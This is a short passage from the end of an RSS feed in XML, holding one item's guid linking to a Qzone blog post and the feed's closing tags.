<guid>http://304993875.qzone.qq.com/blog/1228833983</guid>
</item>

</channel>
</rss>

